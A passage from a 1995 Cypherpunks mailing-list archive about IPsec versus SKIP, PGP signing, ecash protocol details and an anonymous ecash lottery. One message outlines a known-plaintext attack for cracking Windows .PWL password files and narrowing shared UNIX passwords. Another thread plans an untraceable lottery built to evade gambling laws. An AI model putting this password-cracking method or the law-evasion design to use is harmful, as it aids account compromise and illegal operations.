infrastructure. SKIP isn't going to be the standard.

> Can I also assume that the IPV6 stuff requires pretty extensive kernel
> mods? (Not bad, but a very definite consideration)

IPSEC, SKIP, IPv6, etc., all require kernel mods. You can't help
it. Its part of the IP stack, you know.

BTW, IPv6 uses IPSEC, but IPSEC isn't only for IPv6 -- its also usable
in IPv4. We were careful about how we architected that.

The NRL code implements IPsec for both v4 and for the v6 stack it
comes with. In fact, the NRL code is primarily an IPv6 implementation
-- they just implemented IPSEC as a side effect.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 30 Nov 1995 04:22:49 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Medical Records
In-Reply-To: <01HY7U2Z5PSG8WYVEV@mbcl.rutgers.edu>
Message-ID: <9511291929.AA01140@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Exactly! We need to point out that crypto is essential to protect us from 
criminals. Some criminials may use crypto technology, just as they use faxes and 
portable phones. But just because a portable phone could be used by a drug 
dealer does not mean they should be illegal.

Jim Bizdos just pinned a rather cool poster to the wall of the 3rd florr coffee 
lounge here at MIT today. It has a woman on a phone labeled "escrow enabled" and 
then the spooks listening in from a post marked "escrow integrity center". The 
motto is "A good Marketing Agency Listens to its Customers - We Hear You!"

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Thu, 30 Nov 1995 04:22:34 +0800
To: cypherpunks@toad.com
Subject: So easy... in the future.
In-Reply-To: <9511291354.AA16998@sulphur.osf.org>
Message-ID: <Pine.LNX.3.91.951129142107.741C-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've found mkpgp to be a very useful tool, and an easy to use add on for 
'pine' and pgp. But for those that prefer a GUI E-Mail application,
I think it would be great if Netscape were to integrate some 
more security in that portion of their navigator. Or perhaps a third 
party could add this in by creating a PGP 'Plugin' for Netscape...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMLy0YJDNAGOpPg0ZAQF1mQQAkgbwvBrrmqCYedYpW/+c1HfTIqQ6HUyp
buxNTga6x2yUTM/nprWo/y+RrhdckO3UgLgu8dW2p/fH9g9GAhxuimDaVijb3/LR
pL8mi6/q1LAu80IOh0jktiQXQL+V4ySq/f688snlmlOdQDpjKWo9tsmUtw5+DhDF
b5URyUM+4Ms=
=Iixz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 30 Nov 1995 04:52:25 +0800
To: Adam Hupp <ahupp@primenet.com>
Subject: Re: key for Alice as promised (not)
In-Reply-To: <199511290315.UAA26439@usr4.primenet.com>
Message-ID: <Pine.SUN.3.91.951129143454.8834A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, Adam Hupp wrote:

> >Can you imagine??  I'm simply not willing to fool myself into thinking 
> >that I ahve security by posting a key and using PGP.
> 
> Unless you can post some proof that PGP is insecure, stop insisting it is.

Hold on a minute.  Alice is, here, 100% correct.

If I use PGP to read messages and there's a videocamera trained on the 
keyboard, and other people have access to the machine, PGP is not 
secure.  Similarly, if PGP is on a computer which other people may use 
without my supervision, they can  monitor keystrokes, etc. and PGP is not 
secure.

A chain is only as strong as its weakest link; Alice recognizes this, and 
makes no claim that PGP itself is the weak link.  The weak link is the 
physical security of the system which Alice claims to use.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Thu, 30 Nov 1995 07:10:28 +0800
To: cypherpunks@toad.com
Subject: Response to ping re: CJR
Message-ID: <199511292240.OAA09940@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I just got a message on my answering machine from Sam Capino. He said
they are working on answer to my CJR. They had hoped to get it out by
now, but were set back by "the furlough." I had called him about a
week ago to check up on the status, but at the time only got his
answering machine.

Of course, the original 15 days have passed, but I'm perfectly willing
to let that slide since I'm not completely sure that the CJR was
submitted using exactly the right process.

Just thought you'd like to know.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 30 Nov 1995 04:58:50 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: The future will be easy to use
In-Reply-To: <199511290707.XAA24211@blob.best.net>
Message-ID: <Pine.SUN.3.91.951129144206.8834B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995, James A. Donald wrote:

> At 03:30 PM 11/28/95 EST, Carl Ellison wrote:
> > Of course.  This isn't the base case.  We would have some keys which I sign
> > based on my own personal knowledge; things handed to me by people I know;
> > some possibly published in the paper where the real key owner would see the
> > claim and be able to contest it.
> 
> You are making the same erroneous assumption that Phil made when he
> designed the Web of trust:  You assume that it is important and 
> interesting to link key ID's to physical bodies.  This is usually
> not the case:  Linking key ID's to home web pages etc is not only 
> easier -- it is also usually more interesting and important.

Not if you're encrypting a Credit Card transaction to ship physical 
goods.  In that case, I'm going to certainly want to link a key ID to a 
physical body (or at least address) if I'm the seller, so as to limit 
liability as best I can.

While this might not ultimately be important, early adopters of crypto on 
the net seem in general to be financially interested with an eye to limiting 
liability. They want linked keys.

There's a public-relations aspect to crypto which most systems not 
linking name -> key id fail.  This is the step necessary to get it out 
the door.

Unfortunately, it also appears counter to CP philosophy.

However, if you have optional linking of ID and name, shippers will only 
ship to keys with such attributes. Because just ID and address, it could 
be a "hit and run" type attack shipped to a safe maildrop.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@sunflash.eng.usf.edu>
Date: Thu, 30 Nov 1995 04:50:46 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: key for Alice as promised (not)
In-Reply-To: <m0tKrau-00090tC@pacifier.com>
Message-ID: <Pine.SUN.3.91.951129144031.25904B-100000@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Wed, 29 Nov 1995, jim bell wrote:

> Wake up, idiot!  The purpose of encryption and signing and such is to REDUCE
> problems, ideally to zero but if not to some adequately small value.  To
> fail to use signing when there is no ongoing problem is risky; to not use
> signing when there is a  serious continuing problem is downright lunatic.
> That sets up an irresolvable contradiction:  On the one hand, you're willing
> to tolerate a continuing problem, yet on the other you claim that your
> standards are so high that you won't use a system unless the probability of
> security essentially precludes a loss of security.

  Unfortunately priorities are mixed up here.  Reputation should be more 
important, unless Alice is actually a group of teenagers that are just 
having fun at the lists expense, and could care less what they write as 
long as it gets a response.  If the writer actually cared about his 
reputation then a digital signature would be the best way to go, but a 
different encryption scheme should be used for the signature than the 
message.
  Just my $0.02, but if Alice continues to just not care about his 
reputation, and people can't verify that the same writer(s) wrote it, 
then maybe ignoring posts would be a good choice.
  Take care and have fun.

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 05:00:07 +0800
To: Doug Hughes <Doug.Hughes@eng.auburn.edu>
Subject: Re: SKIP Source Release is out!
In-Reply-To: <doug-9510291935.AA029910760@netman.eng.auburn.edu>
Message-ID: <199511291947.OAA03516@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Doug Hughes writes:
> 'Tis a shame, because SKIP is available right now and will, if past history
> is any indication, become the defacto standard on Sun platforms because it
> is readily available,

I suspect that no one else will use it. Morningstar is already
shipping the ESP/AH stuff -- other router vendors are doubtless going
to be doing so soon as well. All other hardware manufacturers will be
running the normal IPSEC too. I suspect Sun is going to have a very
tough sell.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Thu, 30 Nov 1995 06:45:19 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: key for Alice as promised (not)
Message-ID: <m0tKuh9-0008zjC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Tue, 28 Nov 1995, Adam Hupp wrote:
>
>> >Can you imagine??  I'm simply not willing to fool myself into thinking 
>> >that I ahve security by posting a key and using PGP.
>> 
>> Unless you can post some proof that PGP is insecure, stop insisting it is.
>
>Hold on a minute.  Alice is, here, 100% correct.

no, he isn't.  He isn't even using a minimal effort to prevent spoofing, and
he's blaming this on the fact that some particular piece of software (for
example, PGP) isn't absolutely foolproof. 


>If I use PGP to read messages and there's a videocamera trained on the 
>keyboard, and other people have access to the machine, PGP is not 
>secure.  Similarly, if PGP is on a computer which other people may use 
>without my supervision, they can  monitor keystrokes, etc. and PGP is not 
>secure.

True but irrelevant.  This is especially true since the only purpose to
signing messages to a public area is to prevent spoofing.  If somebody does,
indeed, figure out how to break (say) a 1024-bit PGP key and "Alice" gets
spoofed, HE WILL KNOW because he will see a message with his signature that
HE KNOWS he didn't send.  At that point, he will at least be able to reduce
the number of spoofed messages to 1 before he alerts us that there is a
problem.  We won't necessarily know who to believe, of course, but we will
know that one of a number of this is probably true:

1  "Alice" is lying to us.   (by far the most likely.)

2.  Somebody actually has physical access to "Alice's" machine and is
actively using it to spoof messages.

3.  Somebody found out how to break 1024-bit PGP keys easily.  (Very
unlikely, of course.)
 

>A chain is only as strong as its weakest link; Alice recognizes this, and 
>makes no claim that PGP itself is the weak link. 

But "Alice" resists using ANY chain at all!

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 30 Nov 1995 00:38:57 +0800
To: Patiwat Panurach <pati@ipied.tu.ac.th>
Subject: Re: The future will be easy to use (fwd)
Message-ID: <Pine.3.89.9511291640.A7225-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, Patiwat Panurach wrote:

> I feel sad when they say that the market for <1000 $ machines is nill, I 
> had so much fun and learned so much from my old machines.

Personally, I just bought a 486/66 laptop, which would have cost almost 
$1000 with 170 MB hard disk, 4 MB of RAM and Linux (I paid a couple of
hundred extra for a 500 MB disk)... I could have got a Pentium desktop
for the same price if I'd wanted one. So I don't see that there's really a
great advantage to a $ 500 diskless computer (and having worked on Sun
3/50s in the past, I know about all the disadvantages). 

ObCrypto/Security: My landlord bought himself a computer a couple of weeks
ago after he'd lived without them for over forty years, and has been
enthusing about how easy it makes it for him to do his accounts. He just
read about these diskless machines in a magazine, and his first reaction
was that there was no way he'd keep his accounts information on a remote
server. Obviously people *are* more privacy-aware than they're often given
credit for. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fluffy@shout.net (Chris Stillson)
Date: Thu, 30 Nov 1995 06:56:03 +0800
To: "C'Punks" <cypherpunks@toad.com>
Subject: Re: GOST for sale
Message-ID: <199511292216.QAA25781@duracef.shout.net>
MIME-Version: 1.0
Content-Type: text/plain


What I wonder about is why anyone would use the Algorithm
that the NSA is probably best at breaking.  Breaking GOST was probably
their number one project for years, and I would suspect that they
have done it.

chris






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 05:53:39 +0800
To: attila <attila@primenet.com>
Subject: Re: The future will be easy to use
In-Reply-To: <Pine.BSD.3.91.951129205059.29011B-100000@usr2.primenet.com>
Message-ID: <199511292128.QAA03706@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



attila writes:
>     figures. I'll give ipsec and ipsec-dev a look.  However, SUN does have
> the power to make something happen on the high-power workstations, and the
> fact they are making a portable package available in source code is
> farther than anyone else has gone. 

Unfortunately, an internetworking protocol used by only one vendor
gets nowhere.

>     my experience over the last 15 years with Sun is that they do listen 
> to outside "noise" and will move forward.

I doubt it. Ashar Aziz and company at Sun are pretty much
ego-committed to SKIP. Their group might not have nearly as much
justification for its existance without it. That probably makes them
reluctant to go in the right direction.

>    other than the inferior method v. DH, is there anything else missing; 
> I will probably pull the code package of the developers' access machine 
> before the week is out just to take a look.

SKIP is really very alien from the direction most of IPSEC is
taking. It sacrifices a lot of functionality for the perceived benefit
of being able to send an encrypted packet to a host "without prior
negotiation". Unfortunately, that benefit turns out to be a mirage
because in any real network you would need to do a certificate lookup
in order to actually decrypt the packet, at which point you've lost
any advantage. SKIP requires all sorts of hooks into the ESP/AH packet
formats which makes it essentially incompatbile with ESP/AH
implementations. SKIP uses long term keys which could really hurt if
they were compromised. SKIP doesn't do perfect forward secrecy. I
could go on and on.

Ashar keeps answering every criticism with "well, you COULD do X in
SKIP if you just hung this kludge onto it, but of course we hope most
people would never do that".

I started with a lot for respect for the guys and lost most of it
through time. Ah, well.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: J Lavelle <jlavelle@mpx.com.au>
Date: Wed, 29 Nov 1995 14:37:02 +0800
To: cypherpunks@toad.com
Subject: mailing list
Message-ID: <m0tKfsB-0006LNC@kyoko.mpx.com.au>
MIME-Version: 1.0
Content-Type: text/plain


can you put me down on the list, as i have a keen interest in the 
subject.
           Thanx.....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Thu, 30 Nov 1995 19:55:02 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft weak encryption
In-Reply-To: <199511291447.GAA19250@mail.eskimo.com>
Message-ID: <30BC95AB.211E@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Joel McNamara wrote:

> Peter Gutmann has an interesting article in sci.crypt, demonstrating how
> weak Microsoft's encryption is with basic access control in Windows for
> Workgroups (I'm assuming Win95 uses the same algorithm).  Essentially, he
> shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL
> files.  I think a t-shirt is definitely in order for this.

Further information on the method used by Windows NT (a challenge-response
mechanism) can be found on the MSDN CD, or on the MS ftp site:
PSS ID Number: Q102716.  I'll mail the article to anyone that wants to see
it (~11k).


- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Thu, 30 Nov 1995 07:16:21 +0800
To: "cypherpunks@toad.com>
Subject: "Proprietary" internetworking protocols (was RE: The future will be easy to use )
Message-ID: <01BABE83.A3A80240@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger writes:
>attila writes:
>>figures. I'll give ipsec and ipsec-dev a look.  However, SUN does have
>>the power to make something happen on the high-power workstations, and the
>>fact they are making a portable package available in source code is
>>farther than anyone else has gone. 
>
>Unfortunately, an internetworking protocol used by only one vendor
>gets nowhere.

much other discussion ommitted...

I hate to quibble, but past experience may demonstrate this
to be inaccurate.  In particular, and most relevantly:

	NFS (Sun)
	SSL (Netscape)

Another internetworking protocol (IPX) gave Novell a good run.

The point is that a working implementation goes a long way for
people who want/need _something_ that works, NOW. Consider the
relative merits/success of S-HTTP and SSL.

ObCrypto: the POTP people are the Boston Internet Expo today and
tomorrow, and they have their "technical guy" who is supposed
to be answering questions. The nontechnical guy said they generate
random numbers using randomness taken from the text of the messages
being encrypted.

-pl
_Electronic Commerce_ (Charles River Media, available now)
pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 30 Nov 1995 11:01:06 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <199511300232.SAA22068@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 Nov 1995, Adam Shostack wrote:

> > PGP is really not the issue.  The issue is more my security and the
> > environment that I use PGP in.  I don't have a trusted machine to run PGP
> > on.  Anyone who wants to can come up to machine and copy my secret keyring
> > or they can even watch me typing my password in. 
> 
> 	Threat, please??  Do people often stand over your shoulder as
> you type?

Yes.

>  Enter your office, 

Yep, especially my night cleaning staff.

> point guns at you, 

Not recently ... I'd co-operate fully in that situation, though.

> and take a backup of your entire computer?  

You mean like the on-site backups that I have in the filing cabinet 
beside me, or the off-site backups that aren't here (in case of fire, or 
such) nd are completely outside my control?

> Have you considered putting the secret keyring
> on a floppy and locking it in your desk/safe when you're not actually
> in the office? (Or home..)

Yep, I've considerred it.  It's still not all that helpful.  Cleaning 
staff has plenty of time when I'm not around to deal with that.

> > So, I don't fool myself, and I don't use PGP, except for things like
> > exchanging a one-time pad with someone when I've already sent the message
> > out across another delivery mechanism, like on a floppy delivered my
> > courier. 
> 
> 	I don't follow.  You're claiming that PGP is good enough to
> transfer OTPads, but not good enough to sign pseudononymous messages?

Sure. Two different situations.

If I take a message or a data tape and encrypt it with a one time pad.  

And then I send the message out to someone via Greyhound or DHL.

And once they've confirmed that they have the encrypted message safely in 
hand, then I'll call them and ask them to call me with their public key
delivered by voice via telephone.

Which I then use to encrypt the one-time-pad, using the PGP key only once.

Then, I'm comfortable sending it (not the message, but the pad) over the 
Internet encrypted with PGP.  And I think at that point, I have Pretty 
Good Privacy.

> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 Nov 1995 07:59:49 +0800
To: perry@piermont.com
Subject: Re: The future will be easy to use
Message-ID: <01HY84MS8LTC8WYXJI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"perry@piermont.com" 28-NOV-1995 13:34:33.55

Jonathan Zamick writes:
> I can't agree. The model of a successful enterprise includes feedback from
> different levels of participants.

This isn't an enterprise. The government is not a participant except
by their own desire to interfere.
---------
	One reason to incorporate a probable opponent into something is to see
what methods the opponent will likely use. For instance, their debating points
would be nice to know in advance (to the degree they aren't already); while
cyberpunks don't have much access to the mass media, that on the Net
(where a lot of the initial potential users are likely to be) is another
matter. Getting clues to their likely legal strategy may also be valuable.
	On the other hand, letting them know too much may be a problem... of
course, I'm _certain_ the NSA, etcetera get copies of this list.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 Nov 1995 08:16:29 +0800
To: tcmay@got.net
Subject: Re: Directed Hamiltonian Path Problem
Message-ID: <01HY84U9MG468WYXJI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 28-NOV-1995 20:15:30.64

The reason we speak in terms of physical volumes of "Adleman computers" is
to make concrete the way things scale. If the amount of Adleman computers
needed to factor, say, a 2000-digit modulus (or some reasonably equivalent
Hamiltonian cycle problem, such as the TSP) is "ten Pacific oceans full of
them running for 100 years," then one has a pretty clear feel for just how
futile it is to ask about "But what about if we apply MASSIVE
PARALLELISM?!?!"
------------
	Ah. My objection is probably from being too much of a purist in my own
area of science. I do tend to try to be quite careful in whatever I write to
use the correct terms (then explain them for those who've heard the incorrect
ones).

-------------
I don't worry much about factoring breakthroughs. And I don't mean minor
improvements, which keep occurring: I mean major breakthroughs which would
make factoring a 2000-decimal-digit number "easy."

Practically speaking, snarfing private keys is a helluva lot easier, for
many reasons.
--------------
	Umm... it's easier for each one. But the effort in question adds up.
Ultimately, for an agency (NSA, CIA, etcetera) wanting to do a lot of such
unencryptings, coming up with a factoring method is the most efficient way to
go. Fortunately, science doesn't work very well with security classifications
(unlike engineering, which is what most military classified "science" is from
what I know).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 1 Dec 1995 16:12:31 +0800
To: iang@cs.berkeley.edu
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <49j0sq$a69@calum.csclub.uwaterloo.ca>
Message-ID: <199511300250.SAA07657@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> So; is there a problem with the implementation outlined above?  If it were
> implemented, would people play it?
> 

	I think it would be easier if the lottery owner was just in a
safe jurisdiction. Then he wouldn't have to worry about the legality
of it, and not worry about his anonymity. Gambling-safe jurisdictions
*do* exist.
	There lies a problem if *playing* a game is illegal in the US,
which I beleive it may be. If the winners can be revealed by
bank/lottery collusion, then in order to protect the winners the
lottery can't collude with the bank. This may not be a problem,
because the lottery isn't subject to US law, so there would be no way
to force the lottery to collude with the bank to reveaol the
identities of the winners.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 30 Nov 1995 08:38:24 +0800
To: cypherpunks@toad.com
Subject: Re: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <49it0e$r4i@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511212146.NAA11456@cory.EECS.Berkeley.EDU>,
Ian Goldberg  <iang@cory.EECS.Berkeley.EDU> wrote:
>I've managed to decipher a useful bit of the first message sent from
>the shop to the payer.  It's the Payment Request, and contains the following
>information:
>
>o Header identifying packet as Payment Request
>o The integer 4
>o The payment amount, in cents
>o The time (seconds since 1970)
>o The integer 79
>o The name of the shop (payee)
>o A description of the item being paid for
>o An empty string
>o The integer 0
>o End of Record marker
>
>I don't know what the 4, 79, empty string, and 0 are for.  I assume one
>of them (probably the 4) is some indication of currency (US cents).

I now know what the empty string and the 0 are for.  In the event that
a Payment Request is sent out-of-band (in an application/ecash message,
for example), the string and integer are the hostname and port (commonly
1100) to which the payer should connect in order to send a payment.

   - Ian "Wait for it..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 30 Nov 1995 16:44:29 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <ace2609d04021004758e@[205.199.118.202]>
Message-ID: <199511300324.TAA11412@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Personally, I have long had great _hopes_ for using crypto for
> non-sanctioned gambling, but I'm pretty skeptical that many people will do
> it. For one thing, anyone knowledgeable enough to be comfortable with the
> crytography knows that gambling when a house cut exists is a lose. (And
> gambling with no house cut is, at best, a wash.)
> 

	"anyone knowledgeable enough to be comfortable with the
crytography knows that gambling when a house cut exists is a lose."

	These people would not be the target market.

	My figuring is that the target market for lotteries would be
your average joe home web browser, and your gambling addicts, of
course. These people would not be caomfortable with encrypted open
books, but I don't think that encrypted open books is really necessary
to run a lottery which provably doesn't cheat. (Perhaps not
*provably*, but reliably enough that people will play... )
	High stakes lotteries may not be suitable but a slot-machine
low-stakes system with perhaps a $1/play and a 40% chance of winning
*something* (maybe not the full $1.00) could satisfy people enough
that they will keep playing, and tell their friends about it. The
target market here is by no means people who understand that house cut
gambling is a lose.
	The reason to have an ecash casino/lottery is two-fold: A)
Make ecash take off. B) Make lots of money.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Andrew Stevenson <frank@funcom.no>
Date: Thu, 30 Nov 1995 03:47:42 +0800
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Microsoft weak encryption
In-Reply-To: <199511291447.GAA19250@mail.eskimo.com>
Message-ID: <Pine.SGI.3.91.951129200230.29189B-100000@odin>
MIME-Version: 1.0
Content-Type: text/plain



I have been able to verify the key generation for the
.pwl file, and sucessfully decrypted one, the contets
is really suited for a known plaintext attack as the
first characters appears to be the USERNAME in capitals
padded with 0x00 to a total field size of 20,
I have written software to bruteforce this field, but without
optimizing I have a running time of 130 hours (Pentium 66)

An interesting observation: If the password is shared with a UNIX
fileserver (8 letters) once the 32 bit RC4 key is found guessing the
last 4 letters of the password will reveal the remaining letters.
This will then greatly reduce the keyspace needed to crack the UNIX
password (you need to guess the case of the password though - (2^8) )  

> Peter Gutmann has an interesting article in sci.crypt, demonstrating how
> weak Microsoft's encryption is with basic access control in Windows for
> Workgroups (I'm assuming Win95 uses the same algorithm).  Essentially, he
> shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL
> files.  I think a t-shirt is definitely in order for this.
> 
> Anyone up for writing some bruting code?
> 
> Joel
> 

#include <std/disclaimer.h> 
E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for key






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 30 Nov 1995 09:46:39 +0800
To: cypherpunks@toad.com
Subject: ecash lottery (Was: ecash casino)
In-Reply-To: <199511291640.IAA28114@infinity.c2.org>
Message-ID: <49j0sq$a69@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511291640.IAA28114@infinity.c2.org>,
sameer  <sameer@c2.org> wrote:
>	Any enterprising cypherpunks in gambling-friendly
>jurisdictions interested? I figure it would make ecash take off.. and
>you'd get rich.
>
Does anyone know what jurisdictions allow lotteries/gambling?

Here's an off-the-cuff idea:

[Disclaimer: The following post is a gedanken experiment.  It should not
		be interpreted as condoning or encouraging anyone to break any
		laws, no matter how stupid the laws are.]

Anonymous email lotteries:
Advertise the lottery (and include a public PGP key) through some remailer
in one of the above jurisdictions.  Use a remailer that allows pseudonymous
replies.  In the announcement, include a secure hash of the next drawing's
winning number (appended to appropriate amounts of random noise).  Advertise
to a mailing list or a newsgroup, like alt.anonymous.lotteries.announce.

People pay by sending:
{
A payment made out to "@" (the ecash wildcard)
Their choice of lottery ticket number
A PGP Public key
}
encrypted with the lottery's public key, to the remailer address.

A lottery consists simply of displaying the winning number and random
noise, whose hash was previously posted (so the participants know
you're not cheating).

Now: there's likely no Web-of-Trust to the various PGP keys involved,
so the lottery's Reputation will have to be built up.  A good way to
do this is to have smaller prizes being won fairly often (e.g. by matching
the last digit/few bits), so that it's obvious the lottery is not just
collecting money without awarding prizes.

The lottery pays out by replying to the winner's pseudonymous messages
with their payment (made out to "@"), encrypted with their PGP key.

There can be other variants on the lottery.  For example, the participant
whose ticket is _closest_ to the winning number wins all the money
in the pot (minus a cut for the house).  A problem with this, and various
other forms of the lottery, is that it's hard for the lottery to prove
that it's not cheating (either in the amount of money it took in, or
that the losers of the lottery actually lost, etc.).

In this model of payment, no participant knows anything about any other
participant except a remailer's Reply-Block, and a PGP public key.
However, using the features of ecash (from what I know of how it works,
which isn't all that much (yet)), a payer can, in collaboration with the
bank, identify the payee.  This may be undesirable for the lottery operator
and/or the participants.

If (when) details of ecash are published (by Digicash or by someone else),
it would likely be easier to work out how to achieve all-way anonymity with
ecash.  I seem to recall some mention of how this would be done here
a while ago, and Lucky said he was going (before he started working for
them) "to write some scripts that will lay the groundwork for some of the
more unusual applications of Ecash".

Follow-up thought:
The lottery operator, instead of depositing the coins he receives
from the participants, stockpiles them, and forwards them on to the
winner(s).  If a participant complains to the bank, and the bank traces
his payment, it is likely to merely identify another participant
(who is not doing anything illegal, AFAIK (IANAL; it's illegal to _run_
this sort of thing inside the US, not to _play_ it, right?)), and the
lottery owner can even claim he is merely a participant, in the chance event
that he _is_ the one identified, and he happens to be in the US...

As far as I can tell, then, with this sort of method, the only way the
lottery operator could be caught (technically; he could be caught in
non-technical ways, say by being overheard bragging about it (Don't laugh;
it's been done.)) is by having the remailer (or remailer chain) compromised.

So; is there a problem with the implementation outlined above?  If it were
implemented, would people play it?

   - Ian "Still not sure he wants to get an ecash account"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 12:01:20 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <ace2609d04021004758e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:20 AM 11/30/95, Ian Goldberg wrote:

>[Disclaimer: The following post is a gedanken experiment.  It should not
>                be interpreted as condoning or encouraging anyone to break any
>                laws, no matter how stupid the laws are.]

I, on the other hand, have no compunctions about "condoning or encouraging"
various kinds of actions. When condoning and encouraging becomes criminal,
I hope I'll be gone. (Wiseacres will cite hypos in which encouraging a
crime, such as a rape, makes the encouragers culpable. A far cry from
condoning and encouraging tax evasion, gambling, etc.)

On to Ian's proposal:

...
>Now: there's likely no Web-of-Trust to the various PGP keys involved,
>so the lottery's Reputation will have to be built up.  A good way to
>do this is to have smaller prizes being won fairly often (e.g. by matching
>the last digit/few bits), so that it's obvious the lottery is not just
